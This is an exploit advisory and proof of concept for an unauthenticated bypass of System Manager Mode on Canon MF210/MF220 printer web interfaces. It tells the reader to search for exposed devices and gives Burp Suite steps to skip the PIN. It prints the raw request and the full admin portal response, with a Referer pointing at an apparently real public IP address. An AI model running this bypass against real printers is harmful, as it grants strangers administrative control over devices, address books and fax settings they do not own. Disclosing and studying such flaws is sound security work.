# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ]
# Date: [4.6.2018]
# Exploit Author: [Huy Kha]
# Vendor Homepage: [http://global.canon.com]
# Software Link: [ Website ]
# Version: MF210 & MF20 Series
# Severity: High
# Tested on: Mozilla FireFox
# Description : An issue was discovered on Canon MF210 & MF220 printers webinterface.
It is possible for a remote (unauthenticated) attacker to bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication.
# PoC :
Start searching for Canon MF210 & MF220 printers.
You can recognize them with the /login.html parameter, but the version is
also been displayed on the webinterface.
https://imgur.com/a/5ON4HF6
# Example :
1. Go to the following url: http://127.0.0.1/login.html
2. Click on System Manager Mode
3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And forward the request till you get the ''/portal_top.html'' parameter.
# Request :
GET /portal_top.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://129.2.52.116/login.html
Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC
Connection: close
Upgrade-Insecure-Requests: 1
# Response :
HTTP/1.1 200 OK
Expires: Thu, 1 Jan 1998 00:00:00 GMT
Content-Type: text/html
Content-Length: 6119
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0
Connection: close
Set-Cookie:
fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="content-script-type" content="text/javascript" />
<meta http-equiv="content-style-type" content="text/css" />
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="cache-control" content="no-cache,no-store,max-age=0" />
<meta http-equiv="expires" content="Thu, 01 Jan 1970 00:00:00 GMT" />
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<link rel="shortcut icon" type="image/x-icon" href="media/favicon.ico" />
<link rel="stylesheet" type="text/css" media="all" href="css/ja.css" />
<link rel="stylesheet" type="text/css" media="all" href="css/common.css" />
<link rel="stylesheet" type="text/css" media="all" href="css/portal.css" />
<link rel="stylesheet" type="text/css" media="all" href="css/icons.css" />
<script type="text/javascript" src="js/rui.js"></script>
<script language="javascript">
function unloadFunc(e) { }
registEvent(window, "unload", unloadFunc);
</script>
<title>Remote UI: Portal: MF220 Series: MF220 Series</title>
</head>
<body>
<div id="container">
<div id="ruiPotalSet">
<div class="Wrapper">
<div id="portalBranding">
<h1 id="deviceLogo">
<a href="portal_top.html">
<img src="media/branding_logo_imageCLASS.png" />
</a>
</h1>
<div id="productInformation">
<table>
<caption></caption>
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColumn" />
</colgroup>
<tbody>
<tr>
<th>Device Name:</th>
<td>MF220 Series </td>
</tr>
<tr>
<th>Product Name:</th>
<td>MF220 Series </td>
</tr>
<tr>
<th>Location:</th>
<td> </td>
</tr>
</tbody>
</table>
</div>
</div>
<div id="commonTools">
<fieldset id="authTools">
<p><a href="/logout.cgi"><span class="Name">Log Out</span></a></p>
</fieldset>
</div>
</div>
<hr />
</div>
<div id="applications">
<div id="portalApplicationBranding">
<div class="Wrapper">
<h1 id="applicationLogo"><img src="media/app_icon.png" /><span
class="BrandingName">Remote UI: Portal</span></h1>
<div id="appTools">
<a href="mailto:"><span class="Name">Mail to System Manager</span></a>
</div>
</div>
</div>
<hr />
<div id="applicationContents">
<div class="Wrapper">
<div id="contentsWrapper">
<div id="contents">
<div id="contentHeading_potal">
<h2 class="PageName">Device Info</h2>
<div id="contentHeadingTools">
<div id="tmpUpdate">Last Updated:06/04/2018 04:27 AM</div>
<div id="tmpReload">
<a href="javascript:location.reload()"><img src="media/bh_updt.gif"
alt="Update" title="Update" /></a>
</div>
</div>
</div>
<hr />
<h2>Contents</h2>
<div id="quotationModule">
<div class="QuotationModuleHeading"><h3></h3></div>
<div class="QuotationModuleElement">
<div id="deviceBasicInformation" class="ContentModule">
<div class="ModuleHeading"><h4>Device Basic Information</h4></div>
<div id="deviceStatusModule" class="ModuleElement">
<h5>Device Status</h5>
<table class="PropertyListComponent">
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColum" />
</colgroup>
<tbody>
<tr>
<th>Printer:</th>
<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>
<span class="StatusMessage">Sleep mode.</span>
</td>
</tr>
<tr>
<th>Scanner:</th>
<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>
<span class="StatusMessage">Sleep mode.</span>
</td>
</tr>
<tr>
<th>Fax:</th>
<td><span class="StatusIcon"><img src="media/sg_ok.gif"/></span>
<span class="StatusMessage">Ready to send or receive faxes.</span>
</td>
</tr>
</tbody>
</table>
</div>
<div id="deviceErrorInfoModule" class="ModuleElement">
<h5>Error Information</h5>
<p>No errors.</p>
</div>
</div>
<div id="MaintenanceInfomationModule" class="ContentModule">
<div class="ModuleHeading"><h4>Consumables Information</h4></div>
<div id="paperInfomationModule" class="ModuleElement">
<input type="button" class="ButtonEnable" value="Check Consumables Details"
onclick="location.href='consumables_check.html'"/>
<h5>Paper Information</h5>
<table summary="Paper Source, Remaining Paper, Paper Size">
<colgroup>
<col class="PaperSourceColumn" />
<col class="RemainColumn" />
<col class="PaperSizeColumn" />
<col class="PaperTypeColumn" />
</colgroup>
<thead>
<tr>
<th>Paper Source</th>
<th>Paper Level</th>
<th>Paper Size</th>
<th>Paper Type</th>
</tr>
</thead>
<tbody>
<tr>
<th>Multi-Purpose Tray</th>
<td>None</td>
<td>LTR</td>
<td>Plain (16 lb Bond-23 lb Bond)</td>
</tr>
<tr>
<th>Drawer 1</th>
<td>OK</td>
<td>LTR</td>
<td>Plain (16 lb Bond-23 lb Bond)</td>
</tr>
</tbody>
</table>
</div>
<div id="tonerInfomationModule" class="ModuleElement">
<h5>Cartridge Information</h5>
<table>
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColumn" />
</colgroup>
<thead>
<tr>
<th>Color</th>
<th>Level</th>
</tr>
</thead>
<tbody>
<tr>
<th>Black</th>
<td><img src="media/ink_bk06.gif" alt="" title="" />60%</td>
</tr>
</tbody>
</table>
</div>
</div>
<div id="linkInformationModule" class="ContentModule">
<div class="ModuleHeading"><h4>Support Link</h4></div>
<div class="ModuleElement">
<table class="PropertyListComponent">
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColumn" />
</colgroup>
<tbody>
<tr>
<th>Support Link:</th>
<td></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
<hr />
<div id="navigationWrapper">
<div id="navigation">
<h2>menu</h2>
<div id="navStandard">
<h3 class="GroupTitle">Standard Tool</h3>
<ul>
<li class="Main">
<a href="j_plist.html" class="Standby SystemMain"><span class="Name">Status
Monitor/Cancel</span></a>
</li>
<li class="Main">
<a href="p_paper.html" class="Standby UsermodeMain"><span
class="Name">Settings/Registration</span></a>
</li>
</ul>
</div>
<div id="navGeneral">
<ul>
<li class="Main">
<a href="a_addresslistone.html" class="Standby AddressMain">
<span class="Name">Address Book</span></a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<hr />
<div id="applicationInfo">
<address class="SiteInforLegal">Copyright CANON INC. 2014</address>
</div>
</div>
</div>
</body>
</html>
# Do we have now access to the printer with System Manager Mode? : Yes
# Screenshot : https://imgur.com/a/U6oBYNV
# How to fix this? : Remove the default password and add a new (strong) password.